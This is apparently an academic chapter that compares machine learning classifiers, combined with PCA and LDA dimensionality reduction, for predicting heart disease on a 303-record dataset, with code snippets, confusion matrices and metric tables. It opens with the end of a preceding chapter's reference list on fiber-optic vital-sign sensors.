4. Fajkus, M., Nedoma, J., Martinek, R., Vasinek, V., Nazeran, H., & Siska, P. (2017). A non-
invasive multichannel hybrid fiber-optic sensor system for vital sign monitoring. MDPI Sensor.
5. Dziuda, L., Skinbiewski, F., Rozanowski, K., Krej, M., & Lewandowski, J. (2011). Fiber-optic
sensor for respiration and cardiac activity. IEEE.
6. Dziuda, L., Skibniewski, F. W., Krej, M., & Lewandowski, J. (2012). Monitoring respiration
and cardiac activity using Fiber Bragg Grating based sensor. IEEE Transactions on Biomedical
Engineering, 59(7).
7. Wo, J., Wang, H., Sun, Q., Shum, P. P., & Liu, D. (2014). Noninvasive respiration movement
sensor based on distributed Bragg reflector fiber laser with beat frequency interrogation. Journal
of Biomedical Optics, 19(1).
8. De Jonckheere, J., Narbonneau, F., D'Angelo, L. T., Witt, J., Paquet, B., Kinet, D., Kreber,
K., & Logier, R. (2010). FBG-based smart textiles for continuous monitoring of respiratory
movements for healthcare application. IEEE.
9. Silva, A. F., & Carmo, J. P., Mendes, P. M., & Correia, J. H. (2011). Simultaneous cardiac and
respiratory frequency measurement based on single fiber Bragg grating sensor. Measurement
Science and Technology.
10. Wehrle, G., Nohama, P., Kalinowski, H. J., Torres, P. I., & Valente, L.C.G. (2001). A fiber
optic Bragg grating sensor for monitoring ventilator movements. Measurement Science and
Technology 805–809.
11. Elsarnagawy, T. (2015). A simultaneous and validated FBG heartbeat and respiration rate
monitoring systems. Sensors Letters, 13, 1–4.

12. Dziuda, L., Lewandowski, J., Skibniewski, F., & Nowicki, G. (2012). Fiber-optics sensor for
respiration and heart rate monitoring in the MRI environment.
13. Krej, M., Baran, P., & Dziuda, L. (2019). Detection of respiratory rate using a classifier of
waves in the signal from a FBG-based vital signs sensor. Elsevier.
14. De Jonckheere, J., Jeanne, M., Grillet, A., Weber, S., Chaud, P., Logier, R., & Weber, J. L.
(2007). OFSETH: Optical fiber embedded into technical textile for healthcare, an efficient way
to monitor patient under magnetic resonance imaging. In Annual International Conference of
the IEEE Engineering in Medicine and Biology Society.
15. Gurkan, D., Starodubov, D., & Yuan, X. (2005). Monitoring of the heartbeat sounds using an
optical Fiber Bragg Grating sensor. IEEE.
16. Hao, J., Jayachandran, M., KNG, P. L., Foo, S. F., Aung, P. W. A., & Cai, Z. (2009). FBG-based
smart bed system for healthcare applications. Optoelectron China, 3(2), 78–83.
17. Mohapatra, A. G., Khanna, A., Gupta, D., Mohanty, M., & de Albuquerque, V. H. C. (2020).
An experimental approach to evaluate machine learning models for the estimation of load
distribution on suspension bridge using FBG sensors and IoT. Computational Intelligence.
Early-Stage Coronary Ailment
Prediction Using Dimensionality
Reduction and Data Mining Techniques

Krittika Dutta, Satish Chandra, and Mahendra Kumar Gourisaria

Abstract Cardiovascular diseases or heart-related diseases are one of the most


significant causes of mortality in the world over the past few decades and have proved to be among the most life-threatening diseases. The disease can strike a person so suddenly that there is hardly any chance for treatment, so it is a challenging task for doctors to diagnose patients in a timely and correct manner. There is therefore a requirement for a feasible, reliable and accurate method to detect such illness in real time so that genuine medication can follow. Healthcare organizations gather a huge amount of data related to heart disease, but unfortunately these data are not mined for discovering the unseen patterns that would support potent decision making by doctors. This paper aims at developing cost-effective treatment and facilitating a database decision support system by using various data mining techniques such as the state-of-the-art artificial neural network (ANN), AdaBoost, decision tree, Passive Aggressive, logistic regression, voting classifier, Naïve Bayes, K-Nearest Neighbors (KNN), support vector classifier (SVC) and random forest. Dimensionality reduction techniques such as Principal Component Analysis (PCA) and Linear Discriminant Analysis (LDA) are discussed for minimizing the number of attributes and increasing the performance of the machine learning algorithms. The artificial neural network was the best algorithm, with an accuracy of 88.52% with the PCA and 85.24% with the LDA dimensionality reduction technique.

Keywords Health care · Heart disease prediction · PCA · Neural network · Ensemble methods · Decision tree · AdaBoost

1 Introduction

Data mining is the process of identifying hidden patterns and trends in a database and using that vital information to construct predictive models. In the healthcare industry, data mining has become very popular for detecting diseases [1].

K. Dutta · S. Chandra · M. K. Gourisaria (B)


School of Computer Engineering, KIIT Deemed To Be University, Bhubaneswar, Odisha 751024,
India


Nowadays, healthcare organizations collect a huge amount of data about disease diagnosis, patients, electronic patient records, medical devices, hospital resources, etc. These datasets are heterogeneous, widely dispersed, and huge in nature. One of the major challenges of the healthcare industry is investigating patients accurately and administering effective treatments at affordable costs [2]. Data mining algorithms can therefore be applied to these medical datasets to provide doctors with an additional source of information for effective decision making and to provide better service quality to the patients [3].
The heart is one of the most important organs of the human body, pumping blood to every part of the anatomy. If the heart does not function properly, the brain and various other body parts stop functioning, and within a few minutes the person will pass away [4]. Owing to lifestyle changes, bad food habits, and work-related stress, the severity of heart-related diseases increases, thereby affecting the circulatory system [5]. Cardiovascular disease and cardiomyopathy are among the categories of heart disease. Coronary heart disease is caused by the reduction of oxygen and blood supply to the heart and results in chest pain, angina pectoris and heart attacks. There are different forms of cardiovascular disease such as coronary artery disease, stroke, valvular heart disease, high blood pressure, or rheumatic fever. Some early signs of the disease are dizzy spells, shortness of breath, discomfort following meals, palpitations or fatigue [6].
According to a World Health Organization (WHO) survey, one in three adults has high blood pressure, and cardiovascular conditions account for 31% of deaths across the globe, i.e., 17.7 million people die every year due to strokes and heart attacks [7]. Diagnosing heart diseases is an important and complicated task that requires efficiency and accuracy. According to the Global Burden of Disease Report of 2016, 1.7 million Indians have died due to cardiovascular diseases. Heart-related illness reduces the proficiency of a person and also increases expenditure on health care. According to an estimation prepared by the WHO, India lost about $273 billion in wealth from 2005 to 2015 due to cardiovascular or heart-related disease [8]. Cardiovascular disease also encompasses functional complications of the heart such as arrhythmias, irregular heart rhythms, heart-valve abnormalities, heart failure and many other problems. It is a very important and complicated task to diagnose heart-related disease efficiently and accurately [9].
The capacity of medical professionals is limited, and they are not available at certain places, which puts patients at severe risk. This also leads to undesired results and uncontrolled medical costs for patients [10]. Therefore, an efficient and effective heart disease prediction system can be advantageous in the healthcare industry, allowing effective tests and a reduced number of medical tests [11]. This paper deals with automating the heart disease prediction system, i.e., determining whether a person has heart disease or not [12]. Various pre-processing steps have been applied for studying the dataset, and dimensionality reduction techniques such as PCA and LDA have been used to extract the minimum number of features for the different classification algorithms used.
The rest of the paper has been organized into various sections as follows. Section 2
briefs about related works on cardiovascular disease prediction. In Sect. 3, we talk

about the methodology and materials which explain the data inspection and feature
extraction. Sections 3.1 and 3.2 describe the various algorithms implemented in the
paper. Section 4 comprises of results, scrutiny and comparison of models. Section 5
is all about the conclusion and future work.

2 Related Works

Rajkumar et al. (2010) carried out research on forecasting whether a person has a cardiovascular illness or not. They collected the dataset from the UCI repository, having 303 instances and 13 attributes, and used KNN, a decision list and Naïve Bayes for the classification. They found that Naïve Bayes obtained 52.33% accuracy, while the decision list and KNN obtained 52% and 45.67% accuracy, respectively [13]. Kangwanariyakul et al. (2010) used different neural network data mining techniques and the support vector machine (SVM) to build automated technology for classifying Ischemic Heart Disease (IHD) patients. They obtained the dataset by measuring the cardiac magnetic fields at 36 locations (6 × 6 matrices) above the torso. They found that the Bayesian neural network (BNN) and the back-propagation neural network (BPNN) were the best models with 78.43% accuracy, while SVM (RBF kernel) obtained the lowest accuracy of 60.78%. Sensitivity was highest for BNN at 96.55%, while SVM (RBF kernel) had the lowest sensitivity of 41.38%. The RBF kernel SVM and polynomial kernel SVM displayed the maximum and minimum specificity of 86.36% and 45.45%, respectively [14].
Nayak et al. (2019) did research on a dataset taken from the UCI repository having 303 instances with 14 attributes including the target variable. They used various machine learning algorithms such as decision tree, SVM, Naïve Bayes and KNN, and found that Naïve Bayes and SVM achieved 88.67% and 81.13% accuracy, respectively, while KNN had the lowest accuracy of only 67.92% [15]. Mohan et al. (2019) then put forward a novel method for increasing the accuracy of cardiovascular disease prediction, named hybrid random forest with a linear model (HRFLM). In addition to HRFLM, they also applied the support vector machine, random forest, decision tree, recurrent fuzzy neural network (RFNN), logistic regression, Naïve Bayes, deep learning and ensemble methods. Their research was based on the Cleveland heart disease dataset from the UCI repository, having 297 instances with 13 attributes. Their proposed model HRFLM obtained the highest accuracy of 88.4%, while the voting classifier and SVM also performed well with 87.41% and 86.1%. The Naïve Bayes algorithm had the lowest accuracy of 75.8% [6].
Thomas et al. (2016) surveyed different classification algorithms for predicting the possibility of heart disease for each person based on 13 attributes such as gender, age, cholesterol, pulse rate and blood pressure. They used various machine learning techniques such as neural network, KNN, Naïve Bayes and decision tree on different numbers of attributes, and concluded that the accuracy of the algorithms increased when a greater number of attributes was used [16]. Buettner et al. (2019) worked on predicting heart disease with a random forest classifier on the Cleveland dataset having 303

instances with 13 attributes. They trained the model both with tenfold cross-validation and without it. They found that the four categories of chest pain type (atypical anginal, asymptomatic, nonanginal and typical anginal), heart disease status and the number of major vessels were very important for heart disease classification. The model achieved an accuracy of 84.448% with cross-validation and 82.895% without cross-validation [17]. Banu et al. (2014) discussed clustering techniques such as k-means clustering, association rule learning such as the Maximal Frequent Itemset Algorithm (MAFIA) and classification techniques such as decision tree, Naïve Bayes, neural network and the C4.5 algorithm for exploring heart disease. They found that k-means-based MAFIA with ID3 and C4.5 was the best model with an accuracy of 89% [18]. Waghulde et al. (2014) demonstrated the genetic neural network technique for heart disease prediction using the Cleveland dataset and obtained 98% accuracy [19].

3 Materials and Methodology

Machine learning or data mining has become one of the advanced technologies for the healthcare sector [20, 21]. With the help of machine learning or deep learning, many diseases can be predicted in real time, and the entire health industry can benefit from it. This paper deals with predicting whether or not a person has heart or cardiovascular disease. Data classification algorithms such as the artificial neural network (ANN), decision tree, random forest, KNN, SVM, logistic regression and ensemble methods were applied to detect whether a person has a heart problem, following the workflow shown in Fig. 1.
ANN is a computational or mathematical model inspired by the human nervous system [22]. ANN has the unique feature of establishing a relationship between dependent and independent variables and extracts vital information and complex knowledge from datasets. An ANN consists of input and output layer nodes connected through hidden nodes, with a weight assigned to each connection.
Fig. 1 Workflow of heart disease prediction

Hidden layer nodes apply activation functions to pass information toward the output nodes [23]. Logistic regression is mainly used to map the input to a selected set of classes; the logistic sigmoid function is generally used to transform the output in classification [24]. A linear equation is taken as input in logistic regression, and the sigmoid function then performs the binary classification. KNN is a non-parametric algorithm in which the number of neighbors (k) is chosen. Generally, the Euclidean distance is used for the calculation; after calculation, the distances are sorted in increasing order, and the most frequent class among the nearest rows is returned as the predicted value [25]. To maximize predictive accuracy, the support vector machine combines two principles, SRM and ERM: SRM decreases an upper limit on the expected risk, whereas ERM decreases the error on the training data. In the SVM algorithm, every data point is plotted in an n-dimensional space, and the classification then proceeds by searching for the hyper-plane that best separates the two classes. SVM does not perform well on noisy datasets
[26]. A collection of algorithms based on Bayes' theorem together forms the Naïve Bayes classifier. These algorithms share a common principle, namely that every pair of features being classified is independent of each other. The decision tree classifier [27] works like a chain of if-else conditions: a condition is applied at each node of the tree, which leads either to an internal node or to a leaf node. The algorithm works recursively, choosing the best splitting criterion for the dataset in order to build the tree. One main advantage of the decision tree algorithm is that, compared with other algorithms, it requires less effort for data preparation during pre-processing. Noisy data and overfitting are handled by pruning the trees. The random forest classifier [28] creates a set of decision trees, each built from a randomly chosen sub-group of the training set, and collects their votes to determine the class of the test object. The random forest classifier adds extra randomness to the model while growing the trees: instead of searching for the most important attribute when splitting, it selects the best attribute within a random subset. One of the main disadvantages of a random forest classifier is its tendency to overfit, so tuning of the hyperparameters is necessary.
The Passive Aggressive algorithm is an incremental learning algorithm. The main idea of this classifier is that it adjusts its weight vector after every misclassified training sample. Its name comprises two words: "passive" means that if the prediction is correct, no change is made to the model, whereas "aggressive" means that if the prediction is incorrect, changes are made to correct the model [29]. The AdaBoost algorithm is an ensemble meta-algorithm whose main aim is to combine many weak classifiers into one strong classifier. For binary classification problems, AdaBoost is considered the first successful boosting algorithm. In parallel ensemble methods the base learners are created in parallel, whereas in sequential methods the learners are generated one after another [30]. The AdaBoost model is trained iteratively by reweighting the training set on the basis of accuracy: higher weights are assigned to misclassified samples so that they are more likely to be selected in the next iterations.

Simultaneously, a weight is assigned to the classifier trained at each iteration depending on the accuracies of the classifiers, and the process is iterated until the whole training data is fitted without fault [31]. An interesting ensemble solution, which can be considered a subset of stacking, is offered by the voting classifier, in which several base algorithms are evaluated in parallel to exploit their individual peculiarities. Two different strategies are followed: hard voting, in which the class that receives the highest number of votes is chosen, and soft voting, in which the probability vectors of all the classifiers for each predicted class are summed [32].
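For illustration only, the models described above can be instantiated as in the following sketch; the library (scikit-learn), the hyperparameters and the choice of base estimators for the voting classifier are assumptions made for the example, not the authors' exact configuration.

```python
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegression, PassiveAggressiveClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier,
                              VotingClassifier)

def build_models():
    """Return the ten classifiers compared in this study (illustrative settings)."""
    models = {
        "ANN": MLPClassifier(hidden_layer_sizes=(32, 16), max_iter=2000, random_state=0),
        "Logistic R": LogisticRegression(max_iter=1000),
        "KNN": KNeighborsClassifier(n_neighbors=5),
        "SVC": SVC(kernel="rbf", probability=True),
        "Naive Bayes": GaussianNB(),
        "Decision tree": DecisionTreeClassifier(random_state=0),
        "Random forest": RandomForestClassifier(n_estimators=100, random_state=0),
        "Passive aggressive": PassiveAggressiveClassifier(max_iter=1000, random_state=0),
        "AdaBoost": AdaBoostClassifier(n_estimators=100, random_state=0),
    }
    # Soft voting sums the class-probability vectors of the chosen base models
    models["Voting classifier"] = VotingClassifier(
        estimators=[("lr", models["Logistic R"]),
                    ("svc", models["SVC"]),
                    ("nb", models["Naive Bayes"])],
        voting="soft")
    return models
```

Each model is later fitted on the PCA- or LDA-reduced training features and evaluated on the held-out test split.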

3.1 Data Exploration

Exploring the dataset is an important part of applying machine learning algorithms, as it helps us study the statistics and class distribution of the data. The dataset has been collected from Kaggle [33] in CSV format and includes 303 patient records with 13 attributes and 1 target variable. The dataset was divided into two parts, i.e., 30% for testing and 70% for training. Figure 2 shows the correlation graph of the dataset.

Fig. 2 Correlation graph of the dataset attributes
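As a minimal sketch of the inspection and split described above (the file name heart.csv and the label column name target follow the usual layout of the Kaggle heart-disease CSV and are assumptions, not details stated in the paper):

```python
import pandas as pd
from sklearn.model_selection import train_test_split

# Load the heart-disease records: 303 rows, 13 attributes plus 1 target column
df = pd.read_csv("heart.csv")                      # assumed file name
X = df.drop(columns=["target"])                    # assumed label column name
y = df["target"]

# 70% of the records for training and 30% for testing, as in the paper
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.30, random_state=0, stratify=y)

# Pairwise correlations corresponding to the graph shown in Fig. 2
print(df.corr().round(2))
```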

3.2 Feature Selection

In data mining or machine learning, selecting the minimum number of attributes for training the model plays a very important part, as it decreases the computation cost and improves the performance of the algorithm [34, 35]. This paper uses two dimensionality reduction techniques, LDA and PCA.

PCA is a multivariate technique that examines datasets in which the observations are described by many inter-correlated numerical dependent attributes. PCA, a popularly used linear transformation algorithm, is an unsupervised technique for extracting vital information from the dataset and representing it as new orthogonal attributes. Cross-validation techniques such as the jackknife and the bootstrap are used for checking the quality of PCA [36]. The advantages of PCA are its decreased memory and capacity requirements, low noise sensitivity and enhanced efficiency. PCA has been generalized to handle qualitative variables and heterogeneous variables by correspondence analysis (CA) and multifactor analysis (MFA), respectively [37]. The performance of Linear Discriminant Analysis can be evaluated on randomly generated data, and it also handles instances whose class frequencies are uneven. LDA works with the class labels of the data, whereas PCA works only with the features. LDA separates the classes and draws a decision region among them rather than merely changing the location of the data, which helps in understanding the data features [38].
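A short, self-contained sketch of the two reduction steps discussed above is given below, using scikit-learn; the PCA variance threshold and the scaling step are illustrative assumptions (for this binary problem, LDA yields at most one discriminant component), and the file and column names are the same assumed ones used in Sect. 3.1.

```python
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

df = pd.read_csv("heart.csv")                                   # assumed file name
X, y = df.drop(columns=["target"]), df["target"]                # assumed label column
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.30, random_state=0, stratify=y)

# Standardize the attributes before projecting them
scaler = StandardScaler().fit(X_train)
X_train_s, X_test_s = scaler.transform(X_train), scaler.transform(X_test)

# PCA: unsupervised projection keeping the components that explain 95% of the variance
pca = PCA(n_components=0.95).fit(X_train_s)
X_train_pca, X_test_pca = pca.transform(X_train_s), pca.transform(X_test_s)

# LDA: supervised projection, at most (number of classes - 1) = 1 component here
lda = LinearDiscriminantAnalysis().fit(X_train_s, y_train)
X_train_lda, X_test_lda = lda.transform(X_train_s), lda.transform(X_test_s)
```

The classifiers from Sect. 3 are then fitted separately on the PCA- and LDA-reduced training sets.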

4 Result

The performance of the different classifiers needs to be evaluated to assess their correctness on the test dataset and to select the best model. The performance of the algorithms can be described by evaluating different metrics such as precision, recall, F1-score, AUC score, accuracy and balanced accuracy (BAC), obtained from the confusion matrix, which has four outcomes. Table 1 shows the confusion matrix of all the classifiers used in the paper. Tables 2 and 3 show the performance for the various metrics with LDA and PCA, respectively. The performance of the different models with respect to the evaluation metrics is shown graphically in Figs. 3 and 4.

Table 1 Confusion matrix of the algorithms


Algorithms PCA LDA
TP TN FP FN TP TN FP FN
ANN 24 30 3 4 22 30 5 4
Logistic R 22 31 5 3 21 30 6 4
KNN 19 21 8 13 23 27 4 7
SVC 22 31 5 3 20 31 7 3
Naïve Bayes 22 27 5 7 20 31 7 3
Decision tree 24 25 3 9 20 27 7 7
Random forest 24 25 3 9 20 27 7 7
Passive aggressive 21 29 6 5 3 34 24 0
Ada boost 20 29 7 5 24 27 3 7
Voting classifier 22 31 5 3 21 30 6 4

The different evaluating metrics can be calculated with the help of the confu-
sion matrix [39, 40]. The mathematical equations for the various metrics have been
discussed in Eqs. 1–4.

Accuracy = (Tp + Tn) / (Tp + Tn + Fp + Fn)   (1)

Precision = Tp / (Tp + Fp)   (2)

Recall = Tp / (Tp + Fn)   (3)

F1-score = 2 * (P * R) / (P + R)   (4)

where Tp is the true positive, Tn refers to true negative, Fp is the false positive, Fn
means false negative, P refers to precision and R is the recall.

AUC = (SP − PE (NO + 1) / 2) / (PE * NO)   (5)
where NO is the negative observations, PE is the positive examples and SP refers
to sum of positive observations.
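As a quick sanity check of Eqs. 1–4, the snippet below evaluates them on the ANN/PCA confusion counts reported in Table 1 (TP = 24, TN = 30, FP = 3, FN = 4). The resulting accuracy of about 88.52% matches the value reported for ANN in Table 3; the single-class precision and recall printed here differ slightly from Table 3, whose figures appear to be averaged over both classes.

```python
def metrics_from_confusion(tp, tn, fp, fn):
    """Evaluate Eqs. 1-4 on the counts of a 2 x 2 confusion matrix."""
    accuracy = (tp + tn) / (tp + tn + fp + fn)                  # Eq. 1
    precision = tp / (tp + fp)                                  # Eq. 2
    recall = tp / (tp + fn)                                     # Eq. 3
    f1 = 2 * precision * recall / (precision + recall)          # Eq. 4
    return accuracy, precision, recall, f1

# ANN with PCA, counts taken from Table 1
acc, prec, rec, f1 = metrics_from_confusion(tp=24, tn=30, fp=3, fn=4)
print(f"accuracy  = {acc:.4f}")    # 0.8852 -> 88.52%, as in Table 3
print(f"precision = {prec:.4f}")
print(f"recall    = {rec:.4f}")
print(f"F1-score  = {f1:.4f}")
```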
Table 3 shows the results of the different algorithms trained with Principal Compo-
nent Analysis (PCA). It has been observed that the artificial neural network (ANN)
performed well on the dataset with 88.52% accuracy, 88.56% recall, 88.31% preci-
sion and 88.41% F1-score. Logistic regression, SVC and the voting classifier also performed well with 86.89% accuracy, 86.33% recall, 87.06% precision and 86.59%

Table 2 Performance measure of different algorithms for LDA


Algorithms Accuracy Recall Precision F 1 -score ROC
ANN 85.24 84.61 81.48 83.01 83.56
Logistic R 83.61 83.01 83.67 83.24 83.01
KNN 81.97 82.30 81.88 81.89 82.30
SVC 83.61 82.63 84.27 83.06 82.63
N bayes 83.61 82.63 84.27 83.06 82.63
D free 77.05 76.74 76.74 76.74 76.74
R forest 77.05 76.74 76.74 76.74 76.74
Passive A 60.66 55.56 79.31 46.96 55.56
Ada boost 83.61 84.15 83.71 83.57 84.15
VC 83.61 83.01 83.67 83.24 83.01

Table 3 Performance measure of different algorithms for PCA


Algorithms Accuracy Recall Precision F 1 -Score ROC
ANN 88.52 88.56 88.31 88.41 88.56
Logistic R 86.89 86.33 87.06 86.59 86.33
KNN 65.57 66.07 65.89 65.54 66.07
SVC 86.89 86.33 87.06 86.59 86.33
N bayes 80.33 80.45 80.12 80.19 80.45
D tree 80.33 81.21 81.01 80.32 81.21
R forest 80.33 81.21 81.01 80.32 81.21
Passive A 81.97 81.54 81.81 81.65 81.54
Ada boost 80.33 79.68 80.28 79.89 79.68
VC 86.89 86.33 87.06 86.59 86.33

Fig. 3 Performance graph of algorithms for LDA

F1-score. K-Nearest Neighbors did not perform well, as it achieved only 65.57% accuracy, 66.07% recall, 65.89% precision and 65.54% F1-score. Table 2 shows the results of the different algorithms trained with LDA. It has been observed that the artificial neural network (ANN) performed well on the dataset with 85.24% accuracy, 84.61% recall, 81.48% precision and 83.01% F1-score. Logistic regression, SVC and the voting classifier also performed well with 83.61% accuracy, 83.01% recall, 83.67% precision and 83.24% F1-score. The Passive Aggressive classifier did not perform well, as it achieved 60.66% accuracy, 55.56% recall, 46.96% F1-score and 79.31% precision.

Fig. 4 Performance graph of algorithms for PCA

Table 4 Comparative analysis of the paper

Authors | Year | Methodology | Result
Rajkumar and Reena [13] | 2010 | KNN, Naïve Bayes and decision list | Naïve Bayes was the best algorithm with 52.33%
Kangwanarikul et al. [14] | 2010 | SVM, BNN, BPNN | They found that BNN and BPNN were the best algorithms with 78.43% accuracy
Princy and Thomas [16] | 2016 | Neural network, KNN, Naïve Bayes and decision tree | They analyzed the algorithms with different numbers of attributes and attained the highest accuracy of 80.6%
Nayak et al. [15] | 2019 | SVM, Naïve Bayes, KNN | Naïve Bayes performed really well with 88.67% accuracy
Mohan et al. [6] | 2019 | HRFLM, RFNN, SVM, Naïve Bayes | HRFLM was the best model with 88.4% accuracy
Buettner and Schunter [17] | 2019 | Random forest classifier trained with and without cross-validation | The model achieved 84.448% accuracy with cross-validation and 82.895% without cross-validation

5 Conclusion and Future Work

Data mining in the healthcare industry is unlike that in other sectors, as the datasets available are heterogeneous and certain social, legal and ethical restrictions apply to

medical information. The primary motivation of the paper is to furnish more insight into cardiovascular disease prediction, as it is a very important and challenging problem for healthcare organizations. If heart disease is detected at an early stage and medication is given, the mortality rate can be reduced drastically. Various machine learning and deep learning algorithms such as ANN, random forest, decision tree, AdaBoost, Naïve Bayes, KNN, SVM, voting classifier, logistic regression and Passive Aggressive have been trained with the PCA and LDA dimensionality reduction techniques for efficacious and efficient heart disease diagnosis. The study thus makes use of both LDA and PCA for dimensionality reduction. The best algorithm was the artificial neural network, which achieved 88.52% accuracy when trained with PCA and 85.24% accuracy when trained with LDA.
In the future, the research can be extended with more data mining algorithms for predicting the disease more accurately and efficiently. The dataset can be enlarged for better prediction, and techniques such as clustering and K-means need to be explored for simplicity and better efficiency.

References

1. Bhatla, N., & Jyoti, K. (2012). An analysis of heart disease prediction using different data
mining techniques. International Journal Engineering Research and Technology, 1(8), 1–4.
2. Palaniappan, S., & Awang, R. (2008). Intelligent heart disease prediction system using data
mining techniques. AICCSA 08—6th IEEE/ACS international conference on computer systems
and applications (pp. 108–115). doi: https://doi.org/10.1109/AICCSA.2008.4493524.
3. Jalali, S. M. J., Karimi, M., Khosravi, A., & Nahavandi, S. (2019). An efficient neuroevolution
approach for heart disease detection. In 2019 IEEE international conference on Systems, Man
and Cybernetics (SMC), (vol. 77, no. 1, pp. 3771–3776). doi: https://doi.org/10.1109/SMC.
2019.8913997.
4. Alzubi, J. A., Kumar, A., Alzubi, O. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 10(2), 267. https://doi.org/10.5958/0976-5506.2019.00298.5
5. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies, 11(3), 531–538.
6. Mohan, S., Thirumalai, C., & Srivastava, G. (2019). Effective heart disease prediction using
hybrid machine learning techniques. IEEE Access, 7, 81542–81554. https://doi.org/10.1109/
ACCESS.2019.2923707
7. Dangare, C. S., & Apte, S. S. (2012). Improved study of heart disease prediction system using
data mining classification techniques. International Journal of Computers and Applications,
47(10), 44–48. https://doi.org/10.5120/7228-0076
8. Ramalingam, V. V., Dandapath, A., Karthik Raja, M. (2018). Heart disease prediction using
machine learning techniques: A survey. International Journal of Engineering and Technology,
7(2.8), 684–687. doi: https://doi.org/10.14419/ijet.v7i2.8.10557.
9. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2020). Comparative analysis of
heart disease classification algorithms using big data analytical tool. 582–588.
10. Jee, G., Harshvardhan, G., & Gourisaria, M. K. (2021). Juxtaposing inference capabilities of
deep neural models over posteroanterior chest radiographs facilitating COVID-19 detection.
Journal of Interdisciplinary Mathematics 1–27. doi: https://doi.org/10.1080/09720502.2020.
1838061.

11. Atallah, R., & Al-Mousa, A. (2019). Heart disease detection using machine learning majority
voting ensemble method. In 2019 2nd International Conference on new Trends in Computing
Sciences (ICTCS) (pp 1–6). doi: https://doi.org/10.1109/ICTCS.2019.8923053.
12. Nayak, S., Kumar Gourisaria, M., Pandey, M., & Swarup Rautaray, S. (2019). Heart disease
prediction using frequent item set mining and classification technique. International Journal
of Information Engineering and Electronic Business, 11(6), 9–15. doi: https://doi.org/10.5815/
ijieeb.2019.06.02.
13. Rajkumar, A., & Reena, G. S. (2010). Diagnosis of heart disease using datamining algorithm.
Global Jounal Computer Science and Technology, 10(10), 38–43.
14. Kangwanariyakul, Y., Nantasenamat, C., Tantimongcolwat, T., & Naenna, T. (2010). Data
mining of magnetocardiograms for prediction of ischemic heart disease. EXCLI Journal, 9,
82–95. doi: https://doi.org/10.17877/DE290R-15805.
15. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2019). Prediction of heart disease
by mining frequent items and classification techniques. In 2019 International conference on
Intelligent Computing and Control Systems (ICCS) (pp. 607–611). doi: https://doi.org/10.1109/
ICCS45141.2019.9065805.
16. Princy, R. T., & Thomas, J. (2017). Human heart disease prediction system using data mining
techniques. In Proceedings of the IEEE International Conference on Circuit, Power and
Computing Technologies (ICCPCT) 2017.
17. Buettner, R., & Schunter, M. (2019). Efficient machine learning based detection of heart
disease. 2019 IEEE international conference on E-health networking, application & services
(HealthCom) 2019. doi: https://doi.org/10.1109/HealthCom46333.2019.9009429.
18. Nishara Banu, M. A., & Gomathy, B. (2014). Disease forecasting system using data mining
methods. In International Conference on Intelligent Computing Applications (ICICA) 2014
(pp. 130–133). doi: https://doi.org/10.1109/ICICA.2014.36.
19. Waghulde, N. P., & Patil, N. P. (2014). Genetic neural approach for heart disease prediction.
International Journal of Advanced Computer Research, 4(3), 778–784.
20. Dey, S., Gourisaria, M. K., Rautray, S. S., & Pandey, M. (2021). Segmentation of Nuclei in
microscopy images across varied experimental systems. 87–95.
21. Rautaray, S. S., Dey, S., Pandey, M., & Gourisaria, M. K. (2020). Nuclei segmentation in
cell images using fully convolutional neural networks. International Journal on Emerging and
Technology, 11(3), 731–737.
22. Abraham, A. (2005). Artificial neural networks. In Handbook of Measuring System Design.
Wiley.
23. Sharma, S., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9, 5788–5795.
24. Tsangaratos, P., & Ilia, I. (2016). Comparison of a logistic regression and Naïve Bayes classifier
in landslide susceptibility assessments: The influence of models complexity and training dataset
size. CATENA, 145, 164–179. https://doi.org/10.1016/j.catena.2016.06.004
25. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
26. Mavroforakis, M. E., & Theodoridis, S. (2006). A geometric approach to Support Vector
Machine (SVM) classification. IEEE Transactions on Neural Networks, 17(3), 671–682. https://
doi.org/10.1109/TNN.2006.873281
27. Swain, P. H., & Hauska, H. (1977). The decision tree classifier: Design and potential. IEEE
Transactions on Geoscience Electronics, 15(3), 142–147. https://doi.org/10.1109/TGE.1977.
6498972
28. Azar, A. T., Elshazly, H. I., Hassanien, A. E., & Elkorany, A. M. (2014). A random forest
classifier for lymph diseases. Computer Methods and Programs in Biomedicine, 113(2), 465–
473. https://doi.org/10.1016/j.cmpb.2013.11.004
29. Hosseinzadeh, H., Razzazi, F., & Haghbin, A. (2015). A self training approach to auto-
matic modulation classification based on semi-supervised online passive aggressive algorithm.

Wireless Personal Communications, 82(3), 1303–1319. https://doi.org/10.1007/s11277-015-2284-7
30. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107. https://doi.org/10.1007/
s00521-020-04761-6
31. An, T.-K., & Kim, M.-H. (2010). A new diverse AdaBoost classifier. In 2010 International
conference on artificial intelligence and computational intelligence (pp. 359–363). doi: https://
doi.org/10.1109/AICI.2010.82.
32. Saqlain, M., Jargalsaikhan, B., & Lee, J. Y. (2019). A voting ensemble classifier for wafer
map defect patterns identification in semiconductor manufacturing. IEEE Transactions on
Semiconductor Manufacturing, 32(2), 171–182. https://doi.org/10.1109/TSM.2019.2904306
